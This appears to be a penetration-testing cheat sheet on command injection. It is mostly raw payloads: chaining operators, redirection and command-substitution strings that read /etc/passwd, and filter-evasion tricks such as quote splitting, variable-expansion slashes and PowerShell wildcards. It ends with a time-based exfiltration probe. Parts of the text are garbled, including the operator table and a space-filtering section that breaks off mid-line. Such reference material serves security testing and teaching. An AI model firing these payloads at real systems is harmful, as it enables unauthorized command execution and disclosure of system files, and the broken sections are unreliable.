# Command Injection ## Command Chaining ```sh ; ls & ls && ls | ls || ls ``` {% hint style="info" %} Also try: * Prepending a flag or parameter. * Removing spaces (`;ls`). {% endhint %} #### Chaining Operators Windows and Unix supported. | | Syntax | Description | | ----- | --------------- | ------------------------------------------------ | | `%0A` | `cmd1 %0A cmd2` | Newline. Executes both. | | `;` | `cmd1 ; cmd2` | Semi-colon operator. Executes both. | | `&` | `cmd1 & cmd2` | Runs command in the background. Executes both. | | \` | \` | \`cmd1 | | `&&` | `cmd1 && cmd2` | AND operator. Executes `cmd2` if `cmd1` succeds. | | \` | | \` | ## I/O Redirection ```sh > /var/www/html/output.txt < /etc/passwd ``` ## Command Substitution Replace a command output with the command itself. ```sh `cat /etc/passwd` ``` ```sh $(cat /etc/passwd) ``` ## Filter Bypassing ### Space filtering **Linux** ```sh catSlash (`/`) filtering ```sh echo ${HOME:0:1} # / cat ${HOME:0:1}etc${HOME:0:1}passwd ``` ```sh echo . | tr '!-0' '"-1' # / cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd ``` ### Command filtering Quotes. ```sh w'h'o'am'i w"h"o"am"i ``` Slash. ```sh w\ho\am\i /\b\i\n/////s\h ``` At symbol. ```sh who$@ami ``` Variable expansion. ```sh v=/e00tc/pa00sswd cat ${v//00/} ``` Wildcards. ```ps powershell C:\*\*2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc ``` ## Time Based Data Exfiltration ```sh time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi ```